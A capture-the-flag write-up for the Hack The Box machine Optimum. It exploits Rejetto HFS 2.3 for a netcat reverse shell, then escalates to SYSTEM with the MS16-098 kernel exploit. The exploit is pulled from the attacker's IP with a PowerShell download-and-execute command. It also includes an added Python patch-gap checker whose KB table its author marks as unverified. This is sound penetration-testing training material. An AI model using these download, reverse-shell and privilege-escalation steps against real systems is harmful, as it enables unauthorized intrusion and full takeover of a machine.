Hack The Box — Optimum — without Metasploit (TJNull’s list for OSCP)
This is my 26th write-up in the series, this time for Optimum, a machine from TJNull’s list of HackTheBox machines for OSCP practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan on default ports to see what services are running on the target system.
nmap -sC -sV -O -oA nmap/initial optimum.htb
So, on port 80 nmap identifies HttpFileServer httpd 2.3 (Rejetto HFS).
Let’s navigate to that and see what we have.
Nothing of much importance here.
Initial Foothold
Searching Google for exploits against this exact version gives the following result.
https://www.exploit-db.com/exploits/39161
This is an RCE exploit for Rejetto HTTP File Server (HFS) 2.3.x. Going back to the target and viewing the page source
confirms that it is indeed Rejetto HttpFileServer 2.3. The comments at the top of the exploit code explain the setup:
we need to host nc.exe on a web server of our own while running this exploit (the exploit's first stage downloads nc.exe from our machine and then uses it to call back to us). So, first copy the Kali copy of nc.exe into the exploit directory.
locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .
Now set our IP address and listening port in the Python exploit (the ip_addr and local_port variables near the top of the script).
Once done, serve the current directory (which now contains nc.exe) with Python's built-in web server on port 80, and start a listener on port 4242. Binding port 80 requires root, so run the web server with sudo if you are not already root.
python3 -m http.server 80
Now start the listener on port 4242 (that we entered in the python exploit).
rlwrap nc -lvnp 4242
Now, let’s run the exploit.
Running the exploit once, I saw GET requests for nc.exe arrive at my Python web server, but no shell came back. The exploit's comments warn that it may have to be run multiple times, so let's run it again.
The second run gave us a shell.
The shell is running as user kostas.
Privilege Escalation
For privilege escalation we use Windows Exploit Suggester, a Python script that compares the target's patch level (from systeminfo) against Microsoft's security bulletin database. You can grab it from the link below.
https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
Let’s get the target system’s information
systeminfo
Copy the whole output of the systeminfo command into a file sysinfo.txt on the attacking machine.
Update the exploit suggester's database (the script needs Python 2 and the xlrd module).
python2 windows-exploit-suggester.py --update
It downloads the Microsoft Security Bulletin spreadsheet and saves it as a date-stamped xls file.
Now run the script against that database together with our target's system info.
python2 windows-exploit-suggester.py --database 2023-06-06-mssb.xls --systeminfo sysinfo.txt
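To show what Windows-Exploit-Suggester actually does with sysinfo.txt (parse the OS name and the list of installed KBs out of systeminfo output, then report bulletins whose patch is absent), here is an added example of mine; it is not the suggester's own code and not part of the original post. The systeminfo text is a constructed, trimmed sample, and the bulletin table is a hand-built stand-in for mssb.xls with the KB numbers as I recall them for Server 2012 R2; verify them against the real spreadsheet before relying on them.

```python
import re
import sys
from dataclasses import dataclass, field

# Constructed, trimmed sample of `systeminfo` output; not captured from the real box.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2300 Mhz
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB3000061
                           [03]: KB3139914
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
"""

# Hand-built stand-in for the Microsoft security bulletin database (mssb.xls).
# (bulletin, patch KB, affected product, description). Assumption for illustration,
# not rows taken from the real spreadsheet.
BULLETINS = [
    ("MS14-058", "KB3000061", "Windows Server 2012 R2", "win32k.sys TrackPopupMenu, local privilege escalation"),
    ("MS15-051", "KB3045171", "Windows Server 2012 R2", "win32k.sys ClientCopyImage, local privilege escalation"),
    ("MS16-032", "KB3139914", "Windows Server 2012 R2", "Secondary Logon handle leak, local privilege escalation"),
    ("MS16-098", "KB3177725", "Windows Server 2012 R2", "win32k.sys RGNOBJ integer overflow, local privilege escalation"),
]

# "Field Name:   value" lines; hotfix entries start with "[nn]:" and are skipped here.
FIELD_RE = re.compile(r"^([A-Za-z() ]+?):\s+(.*)$")
KB_RE = re.compile(r"\bKB\d+\b")


@dataclass
class SysInfo:
    os_name: str
    os_version: str
    arch: str
    hotfixes: set = field(default_factory=set)


def parse_systeminfo(text):
    """Pull the OS identity and every installed KB out of raw systeminfo output."""
    fields, hotfixes = {}, set()
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
        hotfixes.update(KB_RE.findall(line))   # "[01]: KB2919355" style lines
    return SysInfo(
        os_name=fields.get("OS Name", ""),
        os_version=fields.get("OS Version", ""),
        arch="x64" if "x64" in fields.get("System Type", "") else "x86",
        hotfixes=hotfixes,
    )


def suggest(info, bulletins=BULLETINS):
    """Bulletins that apply to this OS and whose patch KB is not installed."""
    return [
        (bulletin, kb, title)
        for bulletin, kb, product, title in bulletins
        if product in info.os_name and kb not in info.hotfixes
    ]


if __name__ == "__main__":
    # Usage: python3 suggest.py sysinfo.txt   (falls back to the embedded sample)
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_SYSTEMINFO
    info = parse_systeminfo(text)
    print(f"[*] {info.os_name} ({info.arch}), {len(info.hotfixes)} hotfixes installed")
    for bulletin, kb, title in suggest(info):
        print(f"[E] {bulletin}: {title} (patch {kb} missing)")
```

The real tool also follows KB supersedence, which is why it lists far more than this; but the core idea is the same, and it only knows about patches that systeminfo reports, so a box that hides hotfixes gets flagged as unpatched for everything.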
There are many potential exploits listed for this target. First, I tried one of the suggested kernel exploits from exploit-db, but that didn't work.
Then I tried this one (MS16-098, a win32k kernel bug).
https://www.exploit-db.com/exploits/41020/
The comments at the top of this exploit also link to a precompiled executable.
Grab it, put it in the directory served by our Python HTTP server, and pull it onto the target with the following PowerShell command.
powershell.exe -command "Invoke-WebRequest \"http://10.10.16.32:80/41020.exe\" -OutFile \"priv.exe\""
(The backslashes escape the inner double quotes; without them the quotes would terminate the -command string early.)
The exploit is now on the target system. Let's run it.
priv.exe
And we are NT AUTHORITY\SYSTEM (the Windows equivalent of root)!
EZ :)